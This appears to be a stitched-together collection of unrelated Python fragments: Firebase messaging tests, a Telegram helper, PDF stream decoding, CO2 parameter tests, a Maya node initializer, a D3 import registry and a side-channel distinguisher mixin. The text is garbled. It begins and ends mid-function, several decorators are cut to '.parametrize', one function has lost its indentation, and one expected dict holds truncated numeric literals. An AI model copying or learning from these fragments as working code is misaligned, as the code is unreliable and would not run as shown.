        excinfo = self._check_notification(notification)
        expected = 'AndroidNotification.title_loc_key is required when specifying title_loc_args.'
        assert (str(excinfo.value) == expected)
    .parametrize('data', NON_STRING_ARGS)
    def test_invalid_body_loc_key(self, data):
        notification = messaging.AndroidNotification(body_loc_key=data)
        excinfo = self._check_notification(notification)
        assert (str(excinfo.value) == 'AndroidNotification.body_loc_key must be a string.')
    .parametrize('data', NON_LIST_ARGS)
    def test_invalid_body_loc_args(self, data):
        notification = messaging.AndroidNotification(body_loc_key='foo', body_loc_args=data)
        excinfo = self._check_notification(notification)
        if isinstance(data, list):
            expected = 'AndroidNotification.body_loc_args must not contain non-string values.'
            assert (str(excinfo.value) == expected)
        else:
            expected = 'AndroidNotification.body_loc_args must be a list of strings.'
            assert (str(excinfo.value) == expected)
    def test_no_body_loc_key(self):
        notification = messaging.AndroidNotification(body_loc_args=['foo'])
        excinfo = self._check_notification(notification)
        expected = 'AndroidNotification.body_loc_key is required when specifying body_loc_args.'
        assert (str(excinfo.value) == expected)
    .parametrize('data', NON_STRING_ARGS)
    def test_invalid_channel_id(self, data):
        notification = messaging.AndroidNotification(channel_id=data)
        excinfo = self._check_notification(notification)
        assert (str(excinfo.value) == 'AndroidNotification.channel_id must be a string.')
    .parametrize('timestamp', [100, '', 'foo', {}, [], list(), dict()])
    def test_invalid_event_timestamp(self, timestamp):
        notification = messaging.AndroidNotification(event_timestamp=timestamp)
        excinfo = self._check_notification(notification)
        expected = 'AndroidNotification.event_timestamp must be a datetime.'
        assert (str(excinfo.value) == expected)
    .parametrize('priority', (NON_STRING_ARGS + ['foo']))
    def test_invalid_priority(self, priority):
        # Empty strings and non-strings share the "non-empty string" error;
        # other strings must be one of the documented priority names.
        notification = messaging.AndroidNotification(priority=priority)
        excinfo = self._check_notification(notification)
        if isinstance(priority, str):
            if (not priority):
                expected = 'AndroidNotification.priority must be a non-empty string.'
            else:
                expected = 'AndroidNotification.priority must be "default", "min", "low", "high" or "max".'
        else:
            expected = 'AndroidNotification.priority must be a non-empty string.'
        assert (str(excinfo.value) == expected)
    .parametrize('visibility', (NON_STRING_ARGS + ['foo']))
    def test_invalid_visibility(self, visibility):
        notification = messaging.AndroidNotification(visibility=visibility)
        excinfo = self._check_notification(notification)
        if isinstance(visibility, str):
            if (not visibility):
                expected = 'AndroidNotification.visibility must be a non-empty string.'
            else:
                expected = 'AndroidNotification.visibility must be "private", "public" or "secret".'
        else:
            expected = 'AndroidNotification.visibility must be a non-empty string.'
        assert (str(excinfo.value) == expected)
    .parametrize('vibrate_timings', ['', 1, True, 'msec', ['500', 500], [0, 'abc']])
    def test_invalid_vibrate_timings_millis(self, vibrate_timings):
        notification = messaging.AndroidNotification(vibrate_timings_millis=vibrate_timings)
        excinfo = self._check_notification(notification)
        if isinstance(vibrate_timings, list):
            expected = 'AndroidNotification.vibrate_timings_millis must not contain non-number values.'
        else:
            expected = 'AndroidNotification.vibrate_timings_millis must be a list of numbers.'
        assert (str(excinfo.value) == expected)
    def test_negative_vibrate_timings_millis(self):
        notification = messaging.AndroidNotification(vibrate_timings_millis=[100, (- 20), 15])
        excinfo = self._check_notification(notification)
        expected = 'AndroidNotification.vibrate_timings_millis must not be negative.'
        assert (str(excinfo.value) == expected)
    .parametrize('notification_count', ['', 'foo', list(), tuple(), dict()])
    def test_invalid_notification_count(self, notification_count):
        notification = messaging.AndroidNotification(notification_count=notification_count)
        excinfo = self._check_notification(notification)
        assert (str(excinfo.value) == 'AndroidNotification.notification_count must be a number.')
    def test_android_notification(self):
        # Full happy-path encoding with every field populated.
        # NOTE(review): several literals in `expected` below ('red': 0.,
        # 'vibrate_timings': ['0.s', ...], light durations '0.s') look
        # truncated compared to the inputs — verify against the original file.
        msg = messaging.Message(topic='topic', android=messaging.AndroidConfig(notification=messaging.AndroidNotification(title='t', body='b', icon='i', color='#112233', sound='s', tag='t', click_action='ca', title_loc_key='tlk', body_loc_key='blk', title_loc_args=['t1', 't2'], body_loc_args=['b1', 'b2'], channel_id='c', ticker='ticker', sticky=True, event_timestamp=datetime.datetime(2019, 10, 20, 15, 12, 23, 123, tzinfo=datetime.timezone(datetime.timedelta(hours=(- 5)))), local_only=False, priority='high', vibrate_timings_millis=[100, 50, 250], default_vibrate_timings=False, default_sound=True, light_settings=messaging.LightSettings(color='#AABBCCDD', light_on_duration_millis=200, light_off_duration_millis=300), default_light_settings=False, visibility='public', notification_count=1)))
        expected = {'topic': 'topic', 'android': {'notification': {'title': 't', 'body': 'b', 'icon': 'i', 'color': '#112233', 'sound': 's', 'tag': 't', 'click_action': 'ca', 'title_loc_key': 'tlk', 'body_loc_key': 'blk', 'title_loc_args': ['t1', 't2'], 'body_loc_args': ['b1', 'b2'], 'channel_id': 'c', 'ticker': 'ticker', 'sticky': True, 'event_time': '2019-10-20T20:12:23.000123Z', 'local_only': False, 'notification_priority': 'PRIORITY_HIGH', 'vibrate_timings': ['0.s', '0.s', '0.s'], 'default_vibrate_timings': False, 'default_sound': 1, 'light_settings': {'color': {'red': 0., 'green': 0., 'blue': 0.8, 'alpha': 0.}, 'light_on_duration': '0.s', 'light_off_duration': '0.s'}, 'default_light_settings': False, 'visibility': 'PUBLIC', 'notification_count': 1}}}
        check_encoding(msg, expected)
    def test_android_notification_naive_event_timestamp(self):
        # A naive datetime is encoded verbatim (no timezone conversion).
        event_time = datetime.datetime.now()
        msg = messaging.Message(topic='topic', android=messaging.AndroidConfig(notification=messaging.AndroidNotification(title='t', event_timestamp=event_time)))
        expected = {'topic': 'topic', 'android': {'notification': {'title': 't', 'event_time': event_time.strftime('%Y-%m-%dT%H:%M:%S.%fZ')}}}
        check_encoding(msg, expected)
def stop_message_live_location(token, chat_id=None, message_id=None, inline_message_id=None, reply_markup=None, timeout=None):
    """Call Telegram Bot API `stopMessageLiveLocation`.

    Only truthy arguments are forwarded in the request payload, matching the
    Bot API's optional-parameter convention.
    """
    method_url = 'stopMessageLiveLocation'
    payload = {}
    for key, value in (('chat_id', chat_id), ('message_id', message_id), ('inline_message_id', inline_message_id)):
        if value:
            payload[key] = value
    if reply_markup:
        payload['reply_markup'] = _convert_markup(reply_markup)
    if timeout:
        payload['timeout'] = timeout
    return _make_request(token, method_url, params=payload)
def test_serialize_refs_roundtrip_bytes():
    """Refs must be resolvable inside the serialized tree: serializing a model
    whose ref is not among its layers fails, as does deserializing into a
    model that lacks the referenced layer."""
    noop_forward = (lambda model, X, is_train: (X, (lambda dY: dY)))
    ref_model = Model('a', noop_forward)
    model = Model('test', noop_forward, refs={'a': ref_model, 'b': None}).initialize()
    with pytest.raises(ValueError):
        model.to_bytes()
    # With the referenced model included as a layer, serialization succeeds.
    model = Model('test', noop_forward, refs={'a': ref_model, 'b': None}, layers=[ref_model])
    assert model.ref_names == ('a', 'b')
    payload = model.to_bytes()
    with pytest.raises(ValueError):
        Model('test', noop_forward).from_bytes(payload)
    restored = Model('test', noop_forward, layers=[ref_model])
    restored.from_bytes(payload)
    assert restored.ref_names == ('a', 'b')
def defilterData(filtername, stream, params=None):
    """Decode `stream` with the named PDF filter.

    Returns the decoded bytes, or None for an unknown filter name (same
    silent fallthrough as before).
    """
    logger.debug(('Filtering stream with %s' % repr((filtername, params))))
    decoders = {
        'FlateDecode': FlateDecode,
        'LZWDecode': LZWDecode,
        'ASCIIHexDecode': ASCIIHexDecode,
        'ASCII85Decode': ASCII85Decode,
        'RunLengthDecode': RunLengthDecode,
    }
    decoder_cls = decoders.get(filtername)
    if decoder_cls is not None:
        return decoder_cls(params).decode(stream)
    return None
class CO2eqParametersAll(unittest.TestCase):
    """Structural validation of the CO2eq parameters (fallback zone mixes and
    the isRenewable / isLowCarbon contributions).

    The ``check_*`` helpers were clearly written as class/static methods:
    their receiver is named ``cls`` and ``check_valid_ratios_list`` takes no
    receiver at all, yet is invoked as ``cls.check_valid_ratios_list(ratios)``
    — which raises TypeError on a plain instance method. The decorators are
    restored here.
    """
    modes: set[str] = get_possible_modes()
    parameters = CO2EQ_PARAMETERS
    @staticmethod
    def check_valid_ratios_list(ratios):
        """A list of power-origin ratios must contain at least one entry."""
        assert (len(ratios) >= 1)
    @classmethod
    def check_power_origin_ratios(cls, callback1, callback2):
        """Walk every zone's powerOriginRatios.

        `callback1(ratio, zone)` is invoked for each entry of list-valued
        ratios; `callback2(ratios, zone)` for single-object ratios.
        """
        fallback_zone_mixes = cls.parameters['fallbackZoneMixes']
        for (zone, mixes) in (('defaults', fallback_zone_mixes['defaults']), *fallback_zone_mixes['zoneOverrides'].items()):
            ratios = mixes['powerOriginRatios']
            if isinstance(ratios, list):
                cls.check_valid_ratios_list(ratios)
                for ratio in ratios:
                    callback1(ratio, zone)
            else:
                callback2(ratios, zone)
    @classmethod
    def check_contributions(cls, contribution_name, callback):
        """Invoke `callback(mode, contribution, zone)` for every zone/mode."""
        contributions = cls.parameters[contribution_name]
        for (zone, modes_to_contributions) in (('defaults', contributions['defaults']), *contributions['zoneOverrides'].items()):
            for (mode, c) in modes_to_contributions.items():
                callback(mode, c, zone)
    @classmethod
    def check_is_renewable(cls, callback):
        cls.check_contributions('isRenewable', callback)
    @classmethod
    def check_is_low_carbon(cls, callback):
        cls.check_contributions('isLowCarbon', callback)
    def test_power_origin_modes_are_valid(self):
        """Every mode mentioned in a ratio must be a known production mode."""
        def callback(ratio_, zone):
            for (mode, ratio) in ratio_['value'].items():
                if isinstance(ratio, numbers.Number):
                    self.assertIn(mode, self.modes, msg=f"zone '{zone}' contains an invalid mode")
        self.check_power_origin_ratios(callback, callback)
    def test_power_origin_ratio_annual_lists_have_valid_dates(self):
        """List-valued ratios must carry ISO-format datetimes."""
        def callback(ratio, _zone):
            datetime.datetime.fromisoformat(ratio['datetime'])
        self.check_power_origin_ratios(callback, (lambda ratio, zone: None))
    def test_power_origin_ratios_sum_to_1(self):
        """The numeric ratios of each entry must sum to ~1.0."""
        def callback(ratio, zone):
            values = ratio['value'].values()
            self.assertAlmostEqual(1.0, sum((v for v in values if isinstance(v, numbers.Number))), msg=f"zone '{zone}' ratios do not sum to (approximately) 1.0", places=2)
        self.check_power_origin_ratios(callback, callback)
    def test_required_keys_are_present(self):
        """fallbackZoneMixes must have defaults/zoneOverrides with ratios, and
        each ratio object must have 'value' (plus 'datetime' in lists)."""
        def callback1(ratio, _zone):
            self.assertIn('datetime', ratio, msg='lists of power origin ratios must include datetimes')
            self.assertIn('value', ratio)
        def callback2(ratio, _zone):
            self.assertIn('value', ratio)
        self.assertIn('fallbackZoneMixes', self.parameters)
        fallback_zone_mixes = self.parameters['fallbackZoneMixes']
        self.assertIn('defaults', fallback_zone_mixes)
        self.assertIn('powerOriginRatios', fallback_zone_mixes['defaults'])
        self.assertIn('zoneOverrides', fallback_zone_mixes)
        for (zone, mixes) in (('defaults', fallback_zone_mixes['defaults']), *fallback_zone_mixes['zoneOverrides'].items()):
            self.assertIn('powerOriginRatios', mixes, msg=f"key missing from zone '{zone}'")
        self.check_power_origin_ratios(callback1, callback2)
    def check_contribution_object(self, contribution, zone, mode, contribution_name):
        """A contribution must carry a 'value' in [0, 1]."""
        self.assertIn('value', contribution.keys(), msg=f"zone '{zone}' does not contain a value for {contribution_name} contribution for mode {mode}")
        self.assertTrue((0 <= contribution['value'] <= 1), msg=f"zone '{zone}' contains an invalid {contribution_name} contribution for mode {mode}")
    def check_contribution_datetimes(self, contribution, zone, mode, contribution_name):
        """List-valued contributions must have valid, ordered ISO datetimes."""
        dts = []
        try:
            dts = [c['datetime'] for c in contribution]
        except KeyError:
            self.assertTrue(False, msg=f"zone '{zone}' is missing datetimes for the {contribution_name} contributions for mode {mode}")
        try:
            dts = [datetime.datetime.fromisoformat(dt) for dt in dts]
        except ValueError:
            self.assertTrue(False, msg=f"zone '{zone}' contains invalid datetimes for the {contribution_name} contributions for mode {mode}")
        self.assertEqual(dts, sorted(dts), msg=f"zone '{zone}' datetimes for the {contribution_name} contributions for mode {mode} are not ordered")
    def test_is_renewable_valid_datetimes(self):
        def callback(mode, contribution, zone):
            if isinstance(contribution, list):
                self.check_contribution_datetimes(contribution, zone, mode, 'isRenewable')
        self.check_is_renewable(callback)
    def test_is_renewable_valid_contributions(self):
        contribution_name = 'isRenewable'
        def callback(mode, contribution, zone):
            if isinstance(contribution, list):
                for c in contribution:
                    self.check_contribution_object(c, zone, mode, contribution_name)
            else:
                self.check_contribution_object(contribution, zone, mode, contribution_name)
        self.check_is_renewable(callback)
    def test_is_low_carbon_valid_datetimes(self):
        def callback(mode, contribution, zone):
            if isinstance(contribution, list):
                self.check_contribution_datetimes(contribution, zone, mode, 'isLowCarbon')
        self.check_is_low_carbon(callback)
    def test_is_low_carbon_valid_contributions(self):
        contribution_name = 'isLowCarbon'
        def callback(mode, contribution, zone):
            if isinstance(contribution, list):
                for c in contribution:
                    self.check_contribution_object(c, zone, mode, contribution_name)
            else:
                self.check_contribution_object(contribution, zone, mode, contribution_name)
        self.check_is_low_carbon(callback)
def test_layout_evol(node):
    """ETE tree layout: hide the subtree of collapsed nodes and render an
    amino-acid (plus codon) sequence face on annotated leaves."""
    if getattr(node, 'collapsed', None) == 1:
        node.img_style['draw_descendants'] = False
    if node.is_leaf and hasattr(node, 'sequence'):
        seqface = SequenceFace(node.sequence, 'aa', codon=node.nt_sequence, fsize=10, col_w=11, interactive=True)
        faces.add_face_to_node(seqface, node, 1, aligned=True)
class SlotDescriptionsGenerator():
    """Builds SlottedEdgeDescriptions for a row of equally-angled slots."""
    def generate_all_same_angles(self, sections, thickness, extra_slack, depth, height, angle, radius=2):
        """Alternate straight segments and slots that all share one angle.

        `sections` lists segment lengths; a leading 0 means the edge starts
        directly with a slot. Straight edges are compensated for the rounded
        slot corners, and the final edge absorbs the angled-cut overhang.
        """
        slot_width = (thickness + extra_slack)
        descriptions = SlottedEdgeDescriptions()
        # Optional leading slot, encoded as a zero-length first section.
        leading_correction = 0
        index = 0
        if sections[0] == 0:
            leading_slot = SlotDescription(slot_width, depth=depth, angle=angle, start_radius=0, end_radius=radius)
            descriptions.add(leading_slot)
            leading_correction = leading_slot.round_edge_end_correction()
            index += 1
        descriptions.add(StraightEdgeDescription(sections[index], round_edge_compensation=leading_correction))
        index += 1
        for segment_length in sections[index:]:
            slot = SlotDescription(slot_width, depth=depth, angle=angle, radius=radius)
            # The edge preceding each slot must compensate for the slot's
            # rounded start corner.
            descriptions.get_last_edge().round_edge_compensation += slot.round_edge_start_correction()
            descriptions.add(slot)
            descriptions.add(StraightEdgeDescription(segment_length, slot.round_edge_end_correction()))
        # The angled cut overhangs the edge end; extend the last segment.
        overhang = (height * math.tan(math.radians(angle)))
        descriptions.get_last_edge().angle_compensation += overhang
        return descriptions
def test_require4(evmtester, branch_results):
    """Branch coverage of requireBranches with four flags: check which
    source-line branch pairs were recorded as hit (True) or missed (False)."""
    evmtester.requireBranches(4, False, False, False, False)
    results = branch_results()
    for line in (1453, 1484, 1524, 1530, 1555, 1561):
        assert [line, line + 1] in results[True]
    with pytest.raises(VirtualMachineError):
        evmtester.requireBranches(4, False, True, False, False)
    results = branch_results()
    for line in (1453, 1484, 1524):
        assert [line, line + 1] in results[True]
    assert [1530, 1531] in results[False]
    with pytest.raises(VirtualMachineError):
        evmtester.requireBranches(4, True, False, False, False)
    results = branch_results()
    for line in (1459, 1490):
        assert [line, line + 1] in results[True]
    for line in (1453, 1484, 1524):
        assert [line, line + 1] in results[False]
def test_dependency_resolution_4():
    """A circular dependency chain (a1 -> b1 -> c1 -> d1 -> a1) must make
    solve_dependencies raise RuntimeError."""
    specs = [
        ('a1.js', ['b1.js']),
        ('b1.js', ['c1.js']),
        ('c1.js', ['d1.js']),
        ('d1.js', ['e1.js', 'a1.js']),
        ('e1.js', []),
    ]
    things = tuple(Thing(name, deps) for name, deps in specs)
    with raises(RuntimeError):
        solve_dependencies(things)
class ElectionSchema(ma.Schema):
    """Marshmallow schema for one candidate's election summary row."""
    candidate_id = ma.fields.Str()
    candidate_name = ma.fields.Str()
    incumbent_challenge_full = ma.fields.Str()
    party_full = ma.fields.Str()
    # All committee IDs associated with the candidate for this election.
    committee_ids = ma.fields.List(ma.fields.Str)
    candidate_pcc_id = ma.fields.Str(doc="The candidate's primary campaign committee ID")
    candidate_pcc_name = ma.fields.Str(doc="The candidate's primary campaign committee name")
    # Financial totals for the covered period.
    total_receipts = ma.fields.Float()
    total_disbursements = ma.fields.Float()
    cash_on_hand_end_period = ma.fields.Float()
    candidate_election_year = ma.fields.Int()
    coverage_end_date = ma.fields.Date()
def nodeInitializer():
    """Create and register every attribute of the oyBallisticRuler Maya node.

    Declares the start/end positions, frame interval, velocity vector, speed,
    scale, gravity, frame rate and mode inputs, the trajectory-position
    output, and the attributeAffects dependencies between them. The order of
    create/addAttribute calls mirrors the Maya API requirements and must not
    be rearranged casually.
    """
    nAttr = OpenMaya.MFnNumericAttribute()
    tAttr = OpenMaya.MFnTypedAttribute()
    cAttr = OpenMaya.MFnCompoundAttribute()
    eAttr = OpenMaya.MFnEnumAttribute()
    # --- start position (x/y/z children + compound) ----------------------
    oyBallisticRuler.aStartPosX = nAttr.create('startPosX', 'spx', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aStartPosX)
    oyBallisticRuler.aStartPosY = nAttr.create('startPosY', 'spy', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aStartPosY)
    oyBallisticRuler.aStartPosZ = nAttr.create('startPosZ', 'spz', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aStartPosZ)
    oyBallisticRuler.aStartPos = nAttr.create('startPos', 'sp', oyBallisticRuler.aStartPosX, oyBallisticRuler.aStartPosY, oyBallisticRuler.aStartPosZ)
    nAttr.setKeyable(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aStartPos)
    # --- end position (x/y/z children + compound) ------------------------
    oyBallisticRuler.aEndPosX = nAttr.create('endPosX', 'epx', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aEndPosX)
    oyBallisticRuler.aEndPosY = nAttr.create('endPosY', 'epy', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aEndPosY)
    oyBallisticRuler.aEndPosZ = nAttr.create('endPosZ', 'epz', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aEndPosZ)
    oyBallisticRuler.aEndPos = nAttr.create('endPos', 'ep', oyBallisticRuler.aEndPosX, oyBallisticRuler.aEndPosY, oyBallisticRuler.aEndPosZ)
    nAttr.setKeyable(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aEndPos)
    # --- scalar simulation inputs ----------------------------------------
    oyBallisticRuler.aFrameInterval = nAttr.create('frameInterval', 'fi', OpenMaya.MFnNumericData.kInt)
    nAttr.setKeyable(True)
    nAttr.setMin(1)
    nAttr.setDefault(1)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aFrameInterval)
    oyBallisticRuler.aVelocityVectorX = nAttr.create('velocityVectorX', 'vvx', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aVelocityVectorX)
    oyBallisticRuler.aVelocityVectorY = nAttr.create('velocityVectorY', 'vvy', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aVelocityVectorY)
    oyBallisticRuler.aVelocityVectorZ = nAttr.create('velocityVectorZ', 'vvz', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aVelocityVectorZ)
    oyBallisticRuler.aVelocityVector = nAttr.create('velocityVector', 'vv', oyBallisticRuler.aVelocityVectorX, oyBallisticRuler.aVelocityVectorY, oyBallisticRuler.aVelocityVectorZ)
    nAttr.setKeyable(True)
    nAttr.setDefault(0.0, 1.0, 0.0)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aVelocityVector)
    oyBallisticRuler.aSpeed = nAttr.create('speed', 'spd', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    nAttr.setDefault(1.0)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aSpeed)
    oyBallisticRuler.aScale = nAttr.create('scale', 's', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    nAttr.setDefault(1.0)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aScale)
    oyBallisticRuler.aGravity = nAttr.create('gravity', 'g', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    nAttr.setDefault(9.81)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aGravity)
    oyBallisticRuler.aFrameRate = nAttr.create('frameRate', 'fr', OpenMaya.MFnNumericData.kFloat)
    nAttr.setKeyable(True)
    nAttr.setDefault(25.0)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aFrameRate)
    # --- mode enum: which pair of inputs drives the trajectory -----------
    oyBallisticRuler.aMode = eAttr.create('mode', 'm')
    eAttr.addField('Start-End-Time', 0)
    eAttr.addField('Start-Vel-Time', 1)
    eAttr.addField('End-Vel-Time', 2)
    eAttr.setKeyable(False)
    eAttr.setChannelBox(True)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aMode)
    # --- compound input wrapper ------------------------------------------
    oyBallisticRuler.aInput = cAttr.create('input', 'in')
    cAttr.addChild(oyBallisticRuler.aStartPos)
    cAttr.addChild(oyBallisticRuler.aEndPos)
    cAttr.addChild(oyBallisticRuler.aFrameInterval)
    cAttr.addChild(oyBallisticRuler.aVelocityVector)
    cAttr.addChild(oyBallisticRuler.aScale)
    cAttr.addChild(oyBallisticRuler.aGravity)
    cAttr.addChild(oyBallisticRuler.aFrameRate)
    cAttr.addChild(oyBallisticRuler.aMode)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aInput)
    # --- output: computed trajectory positions (vector array) ------------
    defaultVectorArray = OpenMaya.MVectorArray()
    vectorArrayDataFn = OpenMaya.MFnVectorArrayData()
    vectorArrayDataFn.create(defaultVectorArray)
    oyBallisticRuler.aTPos = tAttr.create('trajectoryPosition', 'tp', OpenMaya.MFnData.kVectorArray, vectorArrayDataFn.object())
    tAttr.setWritable(False)
    tAttr.setStorable(False)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aTPos)
    oyBallisticRuler.aOutput = cAttr.create('output', 'op')
    cAttr.addChild(oyBallisticRuler.aTPos)
    oyBallisticRuler.addAttribute(oyBallisticRuler.aOutput)
    # --- dependency graph: every input dirties the trajectory output -----
    oyBallisticRuler.attributeAffects(oyBallisticRuler.aStartPos, oyBallisticRuler.aTPos)
    oyBallisticRuler.attributeAffects(oyBallisticRuler.aEndPos, oyBallisticRuler.aTPos)
    oyBallisticRuler.attributeAffects(oyBallisticRuler.aFrameInterval, oyBallisticRuler.aTPos)
    oyBallisticRuler.attributeAffects(oyBallisticRuler.aVelocityVector, oyBallisticRuler.aTPos)
    oyBallisticRuler.attributeAffects(oyBallisticRuler.aSpeed, oyBallisticRuler.aTPos)
    oyBallisticRuler.attributeAffects(oyBallisticRuler.aScale, oyBallisticRuler.aTPos)
    oyBallisticRuler.attributeAffects(oyBallisticRuler.aGravity, oyBallisticRuler.aTPos)
    oyBallisticRuler.attributeAffects(oyBallisticRuler.aFrameRate, oyBallisticRuler.aTPos)
    oyBallisticRuler.attributeAffects(oyBallisticRuler.aMode, oyBallisticRuler.aTPos)
def _zip(lines1, lines2, offset):
n = max(len(lines1), len(lines2))
nchars = len(lines1[0])
while (len(lines1) < n):
lines1.append((' ' * nchars))
while (len(lines2) < n):
lines2.append((' ' * nchars))
text = ''
i = 0
for (line1, line2) in zip(lines1, lines2):
if (i > 0):
text += (' ' * offset)
i += 1
text += (((line1 + ' ') + line2) + '\n')
return text |
class ImportPackagesD3Exts():
    """Registry of the official D3.js extension modules.

    Resolves a module name either to a pre-linked module (when one was
    supplied via *links*) or to a freshly built :class:`ImportModule` backed
    by the shared *js* / *css* resource maps.
    """

    def __init__(self, js: dict, css: dict, links: Optional[dict] = None):
        """
        :param js: JavaScript resource mapping shared by all modules.
        :param css: CSS resource mapping shared by all modules.
        :param links: Optional mapping of already-resolved modules, keyed by name.
        """
        self._js = js
        self._css = css
        # Normalise None to an empty dict: the original stored None directly,
        # so get() crashed with TypeError ("argument of type 'NoneType' is
        # not iterable") whenever links was omitted.
        self.__linked = links if links is not None else {}

    def get(self, name: str):
        """Return the module registered under *name* (the linked one if present)."""
        if name in self.__linked:
            return self.__linked[name]
        return ImportModule(name, self._js, self._css, self.__linked)

    def tip(self) -> 'ImportModule':
        return self.get('d3-tip')

    def axis(self) -> 'ImportModule':
        return self.get('d3-axis')

    def ease(self) -> 'ImportModule':
        return self.get('d3-ease')

    def dsv(self) -> 'ImportModule':
        return self.get('d3-dsv')

    def dispatch(self) -> 'ImportModule':
        return self.get('d3-dispatch')

    def transition(self) -> 'ImportModule':
        return self.get('d3-transition')

    def selection(self) -> 'ImportModule':
        return self.get('d3-selection')

    def interpolate(self) -> 'ImportModule':
        return self.get('d3-interpolate')

    def time_format(self) -> 'ImportModule':
        return self.get('d3-time-format')

    def time(self) -> 'ImportModule':
        return self.get('d3-time')

    def array(self) -> 'ImportModule':
        return self.get('d3-array')

    def format(self) -> 'ImportModule':
        return self.get('d3-format')

    def timer(self) -> 'ImportModule':
        return self.get('d3-timer')

    def collection(self) -> 'ImportModule':
        return self.get('d3-collection')

    def scale(self) -> 'ImportModule':
        return self.get('d3-scale')

    def color(self) -> 'ImportModule':
        return self.get('d3-color')

    def brush(self) -> 'ImportModule':
        return self.get('d3-brush')

    def drag(self) -> 'ImportModule':
        return self.get('d3-drag')

    def shape(self) -> 'ImportModule':
        return self.get('d3-shape')

    def zoom(self) -> 'ImportModule':
        return self.get('d3-zoom')

    def path(self) -> 'ImportModule':
        return self.get('d3-path')
class DistinguisherMixin(abc.ABC):
    """Incremental side-channel distinguisher state machine.

    Subclasses implement ``_initialize``, ``_update`` and ``_compute``; this
    mixin handles input validation, lazy first-batch initialisation, a
    one-time memory-budget check and restoring the caller's original data
    shape on :meth:`compute`.
    """

    def update(self, traces, data):
        """Fold one batch of traces/intermediate data into the state.

        Both arguments must be numpy arrays with matching first dimensions
        (number of traces); ``data`` is flattened to 2-D for processing and
        its original shape is remembered for :meth:`compute`.

        Raises TypeError on non-ndarray inputs and ValueError on mismatched
        first dimensions.
        """
        if (not isinstance(traces, _np.ndarray)):
            raise TypeError(f'traces must be numpy ndarray, not {type(traces)}.')
        if (not isinstance(data, _np.ndarray)):
            raise TypeError(f'data must be numpy ndarray, not {type(data)}.')
        if (traces.shape[0] != data.shape[0]):
            raise ValueError(f'traces and data must have the same first dimension, not {traces.shape[0]} for traces and {data.shape[0]} for data.')
        logger.info(f'Start update of distinguisher {self.__class__.__name__} with traces {traces.shape} and data {data.shape}.')
        o_shape = data.shape
        data = data.reshape((o_shape[0], (- 1)))
        # EAFP: _origin_shape only exists after the first batch, so an
        # AttributeError here means "first call" and triggers initialisation.
        try:
            self._origin_shape
        except AttributeError:
            logger.debug('Initialize distinguisher state.')
            self._origin_shape = o_shape
            logger.debug(f'Origin shape {self._origin_shape}')
            mem = (psutil.virtual_memory().available / (2 ** 30))
            logger.debug(f'Memory usage before compute {mem} GB.')
            self._initialize(traces=traces, data=data)
        self._check(traces=traces, data=data)
        self.processed_traces += traces.shape[0]
        logger.info('Will call _update traces.')
        self._update(traces=traces, data=data)

    def _initialize(self, traces, data):
        # Hook: allocate per-subclass accumulators on the first batch.
        pass

    def _update(self, traces, data):
        # Hook: fold one (already validated, 2-D) batch into the accumulators.
        pass

    def compute(self):
        """Finalize and return the distinguisher result.

        Raises DistinguisherError if the state was never initialised or no
        traces have been processed.  When the original data had more than two
        dimensions, the result is reshaped to restore those leading axes.
        """
        mem = (psutil.virtual_memory().available / (2 ** 30))
        logger.debug(f'Memory usage before compute {mem} GB.')
        try:
            assert (self.processed_traces > 0)
        except (AttributeError, AssertionError):
            raise DistinguisherError('Distinguisher has not been initialized, or no traces have been processed. Please initialize and update the distinguisher before trying to use compute function.')
        if (len(self._origin_shape) > 2):
            return self._compute().reshape((self._origin_shape[1:] + ((- 1),)))
        return self._compute()

    def _compute(self):
        # Hook: produce the final result from the accumulators.
        pass

    def _check(self, traces, data):
        # One-time estimate of peak memory for this analysis; aborts when it
        # would exceed 90% of the RAM available right now.
        if (not self._is_checked):
            data_dim = data.shape[1]
            dtype_size = _np.dtype(self.precision).itemsize
            needed_mem = (((dtype_size * data_dim) * self._memory_usage_coefficient(trace_size=traces.shape[1])) / (2 ** 30))
            available_mem = (psutil.virtual_memory().available / (2 ** 30))
            logger.debug(f'Needed memory estimated to {needed_mem} GB, for available {available_mem}.')
            self._is_checked = True
            if (needed_mem > (0.9 * available_mem)):
                raise DistinguisherError(f'This analysis will probably need more than 90% of your available memory - {available_mem} GB available against {needed_mem} GB needed.')

    def _memory_usage_coefficient(self, trace_size):
        # Default footprint estimate; subclasses override for their own needs.
        return (2 * trace_size)

    def _distinguisher_str(self):
        # Hook: short human-readable name (presumably used in reprs/logs
        # defined elsewhere in the package — not visible from this chunk).
        pass

    def _set_precision(self, precision):
        """Validate and store the floating-point dtype used by accumulators."""
        try:
            precision = _np.dtype(precision)
        except TypeError:
            raise TypeError(f'precision should be a valid dtype, not {precision}.')
        if (precision.kind != 'f'):
